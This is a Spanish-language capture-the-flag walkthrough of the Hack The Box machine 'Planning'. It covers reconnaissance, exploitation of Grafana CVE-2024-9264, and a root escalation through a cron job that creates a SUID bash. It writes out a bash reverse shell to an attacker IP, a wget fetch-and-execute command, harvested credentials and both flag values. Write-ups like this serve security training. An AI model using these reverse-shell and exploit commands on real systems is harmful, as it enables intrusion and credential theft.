Planning
Sobre esta maquina: HTB
Sistema Operativo: Linux
Skills Usados:
Suid
crontabs
grafana
Realizamos el primer escaneo de reconocimiento:
Esta maquina nos trae la siguiente premisa:
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r
nmap -p- --open -sS -T4 -Pn -n 10.10.11.68 -oN first_scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-19 13:58 EDT Nmap scan report for 10.10.11.68 Host is up (0.16s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Hacemos escaneo de versiones y ejecutamos Scripts:
nmap -p80,22 -sVC -T4 -Pn -n 10.10.11.68 -oN version_scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-19 14:00 EDT Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 14:00 (0:00:06 remaining) Nmap scan report for 10.10.11.68 Host is up (0.15s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA) |_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519) 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-server-header: nginx/1.24.0 (Ubuntu) |_http-title: Did not follow redirect to http://planning.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Vemos que corre por el puerto 80:
(captura)
Vemos que no abre nada.
Incluimos el dominio en el etc/host e intentamos enumerar subdominios y conseguimos lo siguiente:
./ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://10.10.11.68' -H "HOST:FUZZ.planning.htb" -fs 178 /'\ /'\ /'\ /\ _/ /\ _/ __ __ /\ _/ \ \ ,\ \ ,/\ /\ \ \ \ ,\ \ \ _/ \ \ _/\ \ _\ \ \ \ _/ \ _\ \ _\ \ _/ \ _\ // // // /_
v2.1.0-dev
:: Method : GET :: URL : http://10.10.11.68 :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt :: Header : Host: FUZZ.planning.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 178
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 154ms]
Agregamos Grafana al etc/hosts:
nvim /etc/hosts
10.10.11.68 grafana.planning.htb
Vemos lo que corre:
(captura)
Ingresamos las credenciales que nos dieron en el inicio y estamos dentro:
(captura)
Revisamos la version de grafana:
whatweb http://grafana.planning.htb http://grafana.planning.htb/login [200 OK] Country[RESERVED][ZZ], Grafana[11.0.0], HTML5, HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.10.11.68], Script[text/javascript], Title[Grafana], UncommonHeaders[x-content-type-options], X-Frame-Options[deny], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.24.0] ELIMINAR ETC HOSTS
Conseguimos un exploit para grafana 11.0.0:
Exploit for Command Injection in Grafana CVE-2024-9264
Creamos una reverse shell:
nvim rev.sh cat rev.sh │ File: rev.sh 1│ #!/bin/bash 2│ 3│ bash -i >& /dev/tcp/10.10.14.50/443 0>&1
levantamos un servidor http:
python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Ejecutamos el exploit mientras nos ponemos en escucha:
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "wget http://10.10.14.50:8000/rev.sh -O /tmp/rev.sh && chmod +x /tmp/rev.sh && /tmp/rev.sh" http://grafana.planning.htb nc -nlvp 443
Y ganamos acceso :
Captura
En el area de env conseguimos usuarios y passwords:
root@7ce659d667d7:/var/lib/grafana# env AWS_AUTH_SESSION_DURATION=15m HOSTNAME=7ce659d667d7 PWD=/var/lib/grafana AWS_AUTH_AssumeRoleEnabled=true GF_PATHS_HOME=/usr/share/grafana AWS_CW_LIST_METRICS_PAGE_LIMIT=500 HOME=/usr/share/grafana AWS_AUTH_EXTERNAL_ID= SHLVL=2 GF_PATHS_PROVISIONING=/etc/grafana/provisioning GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT! GF_SECURITY_ADMIN_USER=enzo GF_PATHS_DATA=/var/lib/grafana GF_PATHS_LOGS=/var/log/grafana PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin AWS_AUTH_AllowedAuthProviders=default,keys,credentials GF_PATHS_PLUGINS=/var/lib/grafana/plugins GF_PATHS_CONFIG=/etc/grafana/grafana.ini _=/usr/bin/env OLDPWD=/lib
Intentamos logearnos por ssh con Enzo y la nueva password y tenemos exito:
ssh enzo@10.10.11.68 enzo@10.10.11.68's password:
Ahora buscamos la primera flag:
enzo@planning:$ ls
agent nohup.out user.txt enzo@planning:$ cat user.txt 7e7974ab5f5f06332f5f29060d29fe1e
Conseguimos la primera flag ahora es momento de escalar privilegios.
Intentando conseguir alguna forma de escalar, consegui en /opt/crontabs un archivo crontab.db que basicamente muestra user y password del dashboard de cronjobs que se ejecutan en el sistema:
enzo@planning:~$ cat /opt/crontabs/crontab.db {"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"} {"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
Verificamos el el dashboard esta corriendo por el puerto 8.000:
enzo@planning:~$ netstat -tupln Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:39445 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 127.0.0.54:53 0.0.0.0:* - udp 0 0 127.0.0.53:53 0.0.0.0:* -
Para poder observarlo en mi sistema hacemos un portforwarding con ssh:
ssh -L 8000:127.0.0.1:8000 enzo@planning.htb
Estamos dentro:
(captura)
Ahora solamente tenemos que crear un Cronjob que nos permita escalar privilengios, en este caso lo haremos en el directorio temporal (tmp) de esa forma al ejecutarlo automaticamente nos convertiremos en root:
(captura)
enzo@planning:~$ cd /tmp enzo@planning:/tmp$ ll total 1472 drwxrwxrwt 14 root root 4096 May 20 22:14 ./ drwxr-xr-x 22 root root 4096 Apr 3 14:40 ../ -rwsr-xr-x 1 root root 1446024 May 20 22:14 bash* -rw-r--r-- 1 root root 0 May 20 22:14 dLhGkzjYvsVNZP93.stderr -rw-r--r-- 1 root root 0 May 20 22:14 dLhGkzjYvsVNZP93.stdout drwxrwxrwt 2 root root 4096 May 20 13:42 .font-unix/ drwxrwxrwt 2 root root 4096 May 20 13:42 .ICE-unix/ drwx------ 3 root root 4096 May 20 14:00 systemd-private-8ede301cbd794ed2adf488819b51ebd6-fwupd.service-9z95Dl/ drwx------ 3 root root 4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-ModemManager.service-DG5nDx/ drwx------ 3 root root 4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-polkit.service-A3mFMF/ drwx------ 3 root root 4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-systemd-logind.service-lxeut5/ drwx------ 3 root root 4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-systemd-resolved.service-7O4Qri/ drwx------ 3 root root 4096 May 20 13:42 systemd-private-8ede301cbd794ed2adf488819b51ebd6-systemd-timesyncd.service-wQI4FM/ drwx------ 3 root root 4096 May 20 14:00 systemd-private-8ede301cbd794ed2adf488819b51ebd6-upower.service-elPRkR/ drwx------ 2 root root 4096 May 20 13:43 vmware-root_738-2999591909/ drwxrwxrwt 2 root root 4096 May 20 13:42 .X11-unix/ drwxrwxrwt 2 root root 4096 May 20 13:42 .XIM-unix/ -rw-r--r-- 1 root root 0 May 20 22:14 YvZsUUfEXayH6lLj.stderr -rw-r--r-- 1 root root 0 May 20 22:14 YvZsUUfEXayH6lLj.stdout
enzo@planning:/tmp$ ./bash -p bash-5.2# whoami root
Ya somos root, buscamos la ultima flag:
bash-5.2# cd /root bash-5.2# ls root.txt scripts bash-5.2# cat root.txt dc98445e7cc013383b09ca25c93051eb
Una vez encontrada la ultima flag, damos por terminada esta maquina.
Last updated